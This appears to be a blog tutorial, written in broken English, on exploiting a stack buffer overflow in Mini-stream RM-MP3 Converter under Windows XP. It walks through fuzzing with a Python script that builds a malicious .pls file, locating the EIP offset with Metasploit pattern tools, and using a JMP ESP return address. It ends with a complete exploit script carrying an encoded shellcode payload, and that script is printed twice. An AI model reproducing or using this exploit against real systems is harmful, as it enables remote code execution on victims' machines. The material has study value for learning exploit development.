tool used : 1. Mini-stream RM-MP3 Converter
2. Ollydbg and install ollydbg in victim and tool BT(terminator)
3. Windows XP
4. Pattern_Create
5. Metasploit Framework
6.Patter_Offsetfirsh specify we attack patterns.application can open some file audio with extentions :
then we make script for fuzzer to application Mini-stream RM-MP3 Converter
filename="kuza.pls"
fly='rtsp://.'+'\x41' * 20000
f=open(filename,'w')
f.write(fly)
f.close()
then we open application ollydbg with RM-MP3 AND that the application's error causes some register in assembly have overe write. Some registers are :ESP, EIP, the screenshoot is :
register EIP is overwrite. now I add string pattern from metasploit.
with writing order :
and if we wish copy the contents of kuza_string.txt with wiritng order cat kuza_string.txt after that paste script
change value of fly ('\x41' * 20000) become a pattern which generated of kuza_string.txt
close application ollydbg and mini-mp3 then start retrun 2 application mentioned an the note a value of pattern which generated.
EIP has overwrite with value : 36695735 and it have mean the EIP will overwrite in byte : 17417
ESP with value : i8Wi9 and it have mean the ESP will overwrite in byte : 17425
we delete script ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7A....) and change with script ("\x90" *xxxx) xxx is value of EIP the above.
example of my script:
filename="kuza.pls"
fly="rtsp://"+"\x90" * 17417
fly+= "\xAD\xED\xEF\xBE"
f=open(filename,'w')
f.write(fly)
f.close()
my close application said, the we open application ollydbg and we run mini-mp3 on inside ollydbg
example of my script :
filename="kuza.pls"
fly='rtsp://'+'\x90' * 17417
fly+= '\xAD\xED\xEF\xBE'
fly+= '\x90' * (17417-len(fly))
fly+= '\xCC' * (20000-len(fly))
f=open(filename,'w')
f.write(fly)
f.close()
below is the picture from ollydbg the open application mini-mp3 before running we search JMP ESP as a springboard
then we change script ('\xAD\xED\xEF\xBE') with ('\xDB\xB3\xA4\x7C')
example of my script:
filename="kuza.pls"
fly='rtsp://'+'\x90' * 17417
fly+= '\xDB\xB3\xA4\x7C'
fly+= '\x90' * (17417-len(fly))
fly+= '\xCC' * (20000-len(fly))
f=open(filename,'w')
f.write(fly)
f.close()
the end result, example my script:
filename="kuza.pls"
fly='rtsp://'+'\x90' * 17417
fly+= '\xDB\xB3\xA4\x7C'
fly+= '\x90' * 32
fly+= ("\xb8\x71\x8b\xf7\x2c\x31\xc9\xb1\x51\xdb\xd2\xd9\x74\x24\xf4\x5b"
"\x31\x43\x0e\x03\x43\x0e\x83\xb2\x8f\x15\xd9\xc8\xfa\x32\x6f\xd8"
"\x02\x3b\x8f\xe7\x95\x4f\x1c\x33\x72\xdb\x98\x07\xf1\xa7\x27\x0f"
"\x04\xb7\xa3\xa0\x1e\xcc\xeb\x1e\x1e\x39\x5a\xd5\x14\x36\x5c\x07"
"\x65\x88\xc6\x7b\x02\xc8\x8d\x84\xca\x03\x60\x8b\x0e\x78\x8f\xb0"
"\xda\x5b\x58\xb3\x07\x28\xc7\x1f\xc9\xc4\x9e\xd4\xc5\x51\xd4\xb5"
"\xc9\x64\x01\x4a\xde\xed\x5c\x20\x3a\xee\x3f\x7b\x73\xd5\xa4\xf0"
"\x37\xd9\xaf\x46\xb4\x92\xc0\x5a\x69\x2f\x60\x6a\x2f\x58\xef\x24"
"\xc1\x74\xbf\x47\x0b\xe2\x13\xd1\xdc\xd8\xa1\x75\x6a\x6c\xf4\xda"
"\xc0\x6d\x28\x8c\x23\x7c\x35\x77\xe4\x80\x10\xd8\x8d\x9a\xfb\x67"
"\x60\x6c\x06\x32\x11\x6f\xf9\x6c\x8d\xb6\x0c\x79\xe3\x1e\xf0\x57"
"\xaf\xf3\x5d\x04\x03\xb7\x32\xe9\xf0\xc8\x65\x8b\x9e\x27\xda\x35"
"\x0c\xc1\x03\x2c\xda\x75\xd9\x3e\xdc\x21\x21\x68\x88\xdd\x8c\xc1"
"\xb2\x0e\x46\x4d\xe1\x81\x7e\xda\x05\x0b\xd3\xb1\x06\x64\xbc\xdc"
"\xb0\x03\x74\x49\xbc\xda\xd7\x21\x16\xb6\x28\x19\x05\x50\x30\xe0"
"\xec\xd8\xe9\xed\x27\x4f\xe9\xc1\xae\x1a\x71\x87\x46\xb8\x14\xce"
"\x72\x54\xb7\x89\x55\x65\xbe\xce\xcc\x31\x48\xf2\x20\x7a\xb9\x58"
"\xbc\x38\x13\x62\x03\x91\xf8\x17\xfe\xd1\x55\x8c\x54\x49\xd8\x2c"
"\x19\x9c\xe3\xa5\x1a\x5e\xcd\x1e\xf4\xf2\xa3\xf1\xab\x98\x42\xa0"
"\x1a\x08\x14\xbd\x4d\xda\x3b\x98\x6b\xd5\x17\xe5\xa2\x83\x68\xe6"
"\x7c\xab\x47\x93\xd4\xaf\xeb\x67\xbe\xb0\x3a\x35\xc0\x9f\xab\xc7"
"\xe6\xc2\x5f\x64\xe8\xd5\x5f\x5a")
f=open(filename,'w')
f.write(fly)
f.close()
result image rm-mp3fly='rtsp://'+'\x90' * 17417
fly+= '\xDB\xB3\xA4\x7C'
fly+= '\x90' * 32
fly+= ("\xb8\x71\x8b\xf7\x2c\x31\xc9\xb1\x51\xdb\xd2\xd9\x74\x24\xf4\x5b"
"\x31\x43\x0e\x03\x43\x0e\x83\xb2\x8f\x15\xd9\xc8\xfa\x32\x6f\xd8"
"\x02\x3b\x8f\xe7\x95\x4f\x1c\x33\x72\xdb\x98\x07\xf1\xa7\x27\x0f"
"\x04\xb7\xa3\xa0\x1e\xcc\xeb\x1e\x1e\x39\x5a\xd5\x14\x36\x5c\x07"
"\x65\x88\xc6\x7b\x02\xc8\x8d\x84\xca\x03\x60\x8b\x0e\x78\x8f\xb0"
"\xda\x5b\x58\xb3\x07\x28\xc7\x1f\xc9\xc4\x9e\xd4\xc5\x51\xd4\xb5"
"\xc9\x64\x01\x4a\xde\xed\x5c\x20\x3a\xee\x3f\x7b\x73\xd5\xa4\xf0"
"\x37\xd9\xaf\x46\xb4\x92\xc0\x5a\x69\x2f\x60\x6a\x2f\x58\xef\x24"
"\xc1\x74\xbf\x47\x0b\xe2\x13\xd1\xdc\xd8\xa1\x75\x6a\x6c\xf4\xda"
"\xc0\x6d\x28\x8c\x23\x7c\x35\x77\xe4\x80\x10\xd8\x8d\x9a\xfb\x67"
"\x60\x6c\x06\x32\x11\x6f\xf9\x6c\x8d\xb6\x0c\x79\xe3\x1e\xf0\x57"
"\xaf\xf3\x5d\x04\x03\xb7\x32\xe9\xf0\xc8\x65\x8b\x9e\x27\xda\x35"
"\x0c\xc1\x03\x2c\xda\x75\xd9\x3e\xdc\x21\x21\x68\x88\xdd\x8c\xc1"
"\xb2\x0e\x46\x4d\xe1\x81\x7e\xda\x05\x0b\xd3\xb1\x06\x64\xbc\xdc"
"\xb0\x03\x74\x49\xbc\xda\xd7\x21\x16\xb6\x28\x19\x05\x50\x30\xe0"
"\xec\xd8\xe9\xed\x27\x4f\xe9\xc1\xae\x1a\x71\x87\x46\xb8\x14\xce"
"\x72\x54\xb7\x89\x55\x65\xbe\xce\xcc\x31\x48\xf2\x20\x7a\xb9\x58"
"\xbc\x38\x13\x62\x03\x91\xf8\x17\xfe\xd1\x55\x8c\x54\x49\xd8\x2c"
"\x19\x9c\xe3\xa5\x1a\x5e\xcd\x1e\xf4\xf2\xa3\xf1\xab\x98\x42\xa0"
"\x1a\x08\x14\xbd\x4d\xda\x3b\x98\x6b\xd5\x17\xe5\xa2\x83\x68\xe6"
"\x7c\xab\x47\x93\xd4\xaf\xeb\x67\xbe\xb0\x3a\x35\xc0\x9f\xab\xc7"
"\xe6\xc2\x5f\x64\xe8\xd5\x5f\x5a")
f=open(filename,'w')
f.write(fly)
f.close()
then we test anything can we control systemnya with writeng order.
i success exploit a aplication mini-mp3 converter..(^_^)..
(......................Good Luck for you.........................)
(......................Good Luck for you.........................)
warning : you do not have to use a python program as I demonstrated, you can use the program perl, ruby, or java..Dependent our Attack patterns.
Tidak ada komentar:
Posting Komentar